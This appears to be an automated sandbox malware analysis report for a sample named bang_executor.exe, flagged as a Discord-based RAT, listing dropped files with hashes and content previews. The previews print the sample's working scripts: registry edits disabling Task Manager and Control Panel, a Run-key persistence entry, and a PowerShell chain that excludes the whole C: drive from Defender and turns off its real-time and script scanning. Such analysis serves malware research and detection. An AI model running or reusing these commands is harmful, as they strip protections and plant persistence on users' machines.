                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF485.tmp.dmp

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:15:09 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):550505
                                      Entropy (8bit):2.9110246894423963
                                      Encrypted:false
                                      SSDEEP:3072:JO/8eERmcSY5Qr1CCqj2X3+vjsP6eg6z33HIoVmfyBOXpIymdSZZW8yP26bNrAwa:3PuNqj2X3Q4iegW+66w0
                                      MD5:A451D7CA0CE9DC7323A90F2101B26B66
                                      SHA1:C28377F37907890332BD13C1D2B3A20927CEF423
                                      SHA-256:9376AF0BC940B15896A326CCB9B206611753E6B3745A1D84920A508F061DF814
                                      SHA-512:AD157A1DFE5ED0E39EFDB9F87AE3C763121F8E8519B1836660294960D871CCD25B1B3A44BF328ADF0DAB7648321ADF40C935CE8FA1DCE9FCE49893D2C63FABD8
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<....(...........(.......?..............l.......8...........T............[..i............3...........5..............................................................................eJ......l6......Lw......................T....... ....F.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF64B.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8812
                                      Entropy (8bit):3.698263602154781
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJzyB6Y9yqhRgmfZhEDGprB89b7QkfBpm:R6lXJGB6YoqhRgmfcDd77f+
                                      MD5:460B597D8E868B33B4D6B8AA560B174D
                                      SHA1:E96025732AEB68BD4A95C16B2DB2F81DC97EFE83
                                      SHA-256:33D648D7F00D58F943D95EA36DFC388BD2CE476F04ED571C41E54FD0471B474C
                                      SHA-512:8FA956C25D35F17A596E26C5972151C82FD76C792CDC2FE2724031C526A8FB301094EBFDC60F514690FE148A93656054B550B120D1A264B88DE13DAC870D6769
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.8.<./.P.i.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF67B.tmp.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.463838786595375
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VY6Ym8M4JL4b6FuHyq8vj4bLwg8d:uIjfSI7Mh7VeJ8BHWU3wg8d
                                      MD5:B47597C32A27CA4403BFC217796B9D4B
                                      SHA1:4D7B5D99ADD2C556994891DED9AFA4C4D6549654
                                      SHA-256:926F6130ACE7DA62EE812DAACA21D8E7482030DF4FADE28B97E1F79C3BE979FF
                                      SHA-512:DA2C2631D8C3CBE0A6EDF608BC07F224C15CDD9C43DB466AAAB58F32A0BA76C7C4449D82A665031B45607F4DEA912FB92AA7C6737591AB86AEA093FDC48121E0
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\executer.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):226
                                      Entropy (8bit):5.355760272568367
                                      Encrypted:false
                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
                                      MD5:FC3575D5BE1A5405683DC33B66D36243
                                      SHA1:1C816D34B7D5B96E077DC3EF640BA8C7BA370502
                                      SHA-256:1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
                                      SHA-512:68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulJnp/p:NllU
                                      MD5:BC6DB77EB243BF62DC31267706650173
                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                      Malicious:false
                                      Preview:@...e.................................X..............@..........

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):121
                                      Entropy (8bit):4.483195666121707
                                      Encrypted:false
                                      SSDEEP:3:mKDDSVTNT8rTJZz1ojkRowAXNYtY:hm9NT8rTJZejFwT+
                                      MD5:140D432DACC3A675F31BFC80171FC928
                                      SHA1:6B886CA57FC64D079F943FAE06210D41341B33B2
                                      SHA-256:DCB23167AC8ECCDB760AFC56B99EF4019CBCF9DBCDF1174F2040B361F3B4F534
                                      SHA-512:B925BEC48D68EC12E6829E07C6D45B313505164D60444DD556F3F6E1739BDB4192E1C2A7D1F14F53C8C77086E49AB9F419DF11E9B6C054906D05D5C38BA4CF6A
                                      Malicious:false
                                      Preview:@echo off....START bang_executor.exe....START executer.exe....START instaling.bat....START mgr.bat....START microsoft.bat

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):351232
                                      Entropy (8bit):3.6442831467064534
                                      Encrypted:false
                                      SSDEEP:1536:I2WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+IPID9IhZTRUpUI6bxNy8FkLlo5J3:IZv5PDwbjNrmAE+MIRIX26I6HjqJL4
                                      MD5:E1EAD094E52097B884389A8064B15E2B
                                      SHA1:894F8DB63A8F41F913A5F5C69D1199EC8AE3F213
                                      SHA-256:82C67ED82A7A319C0AE30F92C187EA0150AC6BA6EF63D2D3B4FC999BB01D064F
                                      SHA-512:96BF368C771BBC9DB1A23B8E57906530936372AA15C963EF370EF47A13328FC67201D4D184911679536CE952869A4BC2ABDC42403E1978028C57C27B154ECEA6
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_DicrordRat, Description: Yara detected Dicrord Rat, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..2...(........... .....@..... ..............................`.....`...@......@............... ...............................`...&........................................................................................... ..H............text...80... ...2.................. ..`.rsrc....&...`...(...4..............@..@........................................H...........x.......".....................................................{....*"..}....*2.(....o....*J. . ..}.....(....*6.|.....("...*6.|.....("...*6.|.....("...*..(....*^.{....{.....{....o7...*6.|.....("...*6.|.....("...*2.( ...(....*F~&....( ...o...+*2~&....o...+*2~&....oM...*2(I....oJ...*.~_...r...p.oe...r...p(f...og...(h...(i...(f...og...ob...*.~u...r...po`...%(v.....R....ow...oc...*.~u...r...po`...%(v.....ow...oc...*6.|2....("...*6.|6....("...*6.|9....("...*6.|=....("...*6.|A..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):280576
                                      Entropy (8bit):2.6303070804826034
                                      Encrypted:false
                                      SSDEEP:1536:aKaGOD3xvWxBVWGV489IhZTRUpUI6bxNy8FkLlo5J6/Sc/N2Qi4b:5NOD3xvWxBVWGV4GIX26I6HjqJLh
                                      MD5:88E22186F196CC0E1E2D500EEAC57337
                                      SHA1:E5E0BD98F08DE159880B58E918959C358EFCA6B1
                                      SHA-256:5DCA36CE98DA2185693A87305811CF7AEEE7B3279298345E4D1F4D37EFE0250B
                                      SHA-512:462FE680BA12DA5FEDEC11D88EA17F9F65B80EE916F665D6208D9DCF3D3494C805D11AAF899914F621835B0A61D014000243FE01B2E00CA34681AFC415A33EE6
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 48%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................ ...&.......>... ...@....@.. ..............................X.....@.................................@>..K....@...#........................................................................... ............... ..H............text........ ... .................. ..`.rsrc....#...@...$..."..............@..@.reloc...............F..............@..B................p>......H.......L!................................................................(....*.0..........(....s...... ...o......:6...(....o.....s......r...po......o.....(....&.....&.....*s........o....r...po......o....rE..po......o....rM..po......o....&s........o....r...po......o....rE..po......o....rx..po......o....&*......@..L......BSJB............v4.0.30319......l...\...#~..........#Strings............#US.p.......#GUID.......p...#Blob...........G..........3............................

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\instaling.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):269
                                      Entropy (8bit):5.123838184463971
                                      Encrypted:false
                                      SSDEEP:6:hQ+Pzmg83tuH1jhRUocn6BVuPzmg83tuH1jhRiD9cA6BY:eV8VjhRUocn6VnV8VjhR4cA6Y
                                      MD5:7E86BEB4C1EBEB8AB77F1D68F14FEC37
                                      SHA1:C9A40241B2407D9492C41BCD70686D6FD829F3BC
                                      SHA-256:5A60B3CC91782E0A7C8CD52701E603299B62C87C0B593D5AC85EBCE74321F2F3
                                      SHA-512:653CE9CBCF427BE11042340859F61CFA30105332ACAD13B94E2D509960BA04D67610276B6A7128D56AA139098B0C1C8D67973FFF7A97976ACFB33D474073D849
                                      Malicious:false
                                      Preview:@echo off..reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f..reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\mgr.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):111
                                      Entropy (8bit):4.957592385538409
                                      Encrypted:false
                                      SSDEEP:3:u3PpM2KD9so3KRfyM1K7eB/k+7W1DbJNAKyMhF7FKD:uPCtuH1jhRi26BY
                                      MD5:9A4A032D9A604C9B7C1E843C6455140E
                                      SHA1:DBE7A610E1697E62722EFB59AD3BC03AFCFD900F
                                      SHA-256:DC0890D3D4A7370ECE704EB075C05418795C47332DFFCC277896E806C38C3DB0
                                      SHA-512:CA045EC576EB55C442959C2709148392FE53F1613B6C5DC9CB5B43592D77563479233C7DEE6E0832E5A95528E1653BA6B73C73A3DC4ED841A7529E6344ECCB3C
                                      Malicious:false
                                      Preview:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\microsoft.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):288
                                      Entropy (8bit):4.979627165157923
                                      Encrypted:false
                                      SSDEEP:6:hmR9BX5Ev72tuH1jRNBiy4F3ndmROehC9DcLMLPDKvfhROehCi:w7sv7vVj4L3dm09DcLuDKHH0i
                                      MD5:77C6969C2641F3C5D6ED44A4FEB48F25
                                      SHA1:9FF375B96CD38CA40A9694698E9AA3BE1FC1D52E
                                      SHA-256:33DBEDBE9FB27DE7C1F75D742E3992675C4D683073538B02A8D69922F366CD6A
                                      SHA-512:530F05816854791916B3409161A1E488D661E02340C4AE7B442EDE31F7B21F70A6B5CFD5D1B330DDD202E104B5F4219253C537D32770E0FDDF0640D178EEFA68
                                      Malicious:false
                                      Preview:@echo off..set "scriptPath=%~dp0"..set "regKey=HKCU\Software\Microsoft\Windows\CurrentVersion\Run"....reg add "%regKey%" /v bang_executor /t REG_SZ /d "%scriptPath%bang_executor.exe" /f....REM bang_executor.exe is the name of your executable file..start "" "%scriptPath%bang_executor.exe"

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxcbbkne.xpk.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u445pafh.03d.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_utsvrizz.31p.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xklgfl4b.pzu.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Windows\appcompat\Programs\Amcache.hve

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.465705900737471
                                      Encrypted:false
                                      SSDEEP:6144:WIXfpi67eLPU9skLmb0b4fWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSbi:bXD94fWlLZMM6YFH5+i
                                      MD5:1AC7374B4730933C5735AE46715CFC5E
                                      SHA1:7BAA427186A3AA367FC41B735D5B483030245B61
                                      SHA-256:74EDC34F926CA3D3C7F688BDAC3106E78C8779E6D688C5BD66E3C61A205CA657
                                      SHA-512:33D38780DEB0016DC6A90494629CAAD642880D202674574C6552B41857569054E427038F70A12A329F07E9A8746F5F861EF26247EEEF220DA789E2AB57FBF39F
                                      Malicious:false
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~.:}2`...............................................................................................................................................................................................................................................................................................................................................P,I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\test.ps1

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with very long lines (3074), with CRLF line terminators
                                      Category:modified
                                      Size (bytes):3076
                                      Entropy (8bit):4.958029243190065
                                      Encrypted:false
                                      SSDEEP:48:nxlrBUdUg7UiUKUKJUtUvQUkUyUz7U5FUCFUUiFxw8oi8v8U8bFbKbFOSFSk3SWa:miqdoTExbFWbFDEnWR43jGqR
                                      MD5:3499745C76F31429C42A3B34D8CC0AF6
                                      SHA1:F9125070406CC2A2A6CF092F3ED3D36751107224
                                      SHA-256:3C2EB503E7D32F48B06199E6C1C350E559C316FD9F6F17F040E41079F44FB6E3
                                      SHA-512:1757EE5F42A8681E84CE3070D7EE164107EBC284BC0EB5424A4E71FE71E122EEADB28D63535D88557C0C49C687CE4514E8D387781EC7C68E1171994183DDE1FB
                                      Malicious:false
                                      Preview:Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction Silently

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):5.876879950601886
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:bang_executor.exe
                                      File size:678'979 bytes
                                      MD5:043e699dbf3d88b6cca5fbe64229ba27
                                      SHA1:50661d32315985eab2a70f1d1f6435b9563ca237
                                      SHA256:2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747
                                      SHA512:04f23cfa08684ce109685bf2068211731018a85bb588cff9de67faca8ecc6e3e02b150a656f91b55557e5f4a949400f90da19f8c37f5abfac034e68e4cc633c2
                                      SSDEEP:6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJM1tc2uQNQ5rHbIOohWy0f:3BdlwHRn+WlYV+Rp2yEM1tc2uYXOos
                                      TLSH:FCE47D02BAC3D075EF21157887E0C699DA79BE944E35C6868FF0BC6CDA33AC65E30585
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6...6...6....V..6....T.'6....U..6..)MZ..6..)M...6..)M...6..)M...6...N$..6...N4..6...6...7..'M...6..'M...6..'MX..6..'M...6.

                                      File Icon

                                      Icon Hash:0f0b1bb29a130f0e

                                      Static PE Info

                                      General

                                      Entrypoint:0x421d50
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x651BC7F7 [Tue Oct 3 07:51:19 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:75e9596d74d063246ba6f3ac7c5369a0

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F114589E82Bh
                                      jmp 00007F114589E1DDh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push 00424F20h
                                      push dword ptr fs:[00000000h]
                                      mov eax, dword ptr [esp+10h]
                                      mov dword ptr [esp+10h], ebp
                                      lea ebp, dword ptr [esp+10h]
                                      sub esp, eax
                                      push ebx
                                      push esi
                                      push edi
                                      mov eax, dword ptr [0044277Ch]
                                      xor dword ptr [ebp-04h], eax
                                      xor eax, ebp
                                      push eax
                                      mov dword ptr [ebp-18h], esp
                                      push dword ptr [ebp-08h]
                                      mov eax, dword ptr [ebp-04h]
                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                      mov dword ptr [ebp-08h], eax
                                      lea eax, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], eax
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      mov ecx, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], ecx
                                      pop ecx
                                      pop edi
                                      pop edi
                                      pop esi
                                      pop ebx
                                      mov esp, ebp
                                      pop ebp
                                      push ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F1145890901h
                                      push 0043F388h
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F11458A0D55h
                                      int3
                                      jmp 00007F11458A2C28h
                                      push ebp
                                      mov ebp, esp
                                      and dword ptr [00466078h], 00000000h
                                      sub esp, 24h
                                      or dword ptr [004427B0h], 01h
                                      push 0000000Ah
                                      call dword ptr [004361D0h]
                                      test eax, eax
                                      je 00007F114589E512h
                                      and dword ptr [ebp-10h], 00000000h
                                      xor eax, eax
                                      push ebx
                                      push esi
                                      push edi
                                      xor ecx, ecx
                                      lea edi, dword ptr [ebp-24h]

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x405c00x34.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x405f40x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x4698c.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xaf0000x255c.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3e3b00x54.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x388b00x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x360000x278.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3fa9c0x120.rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
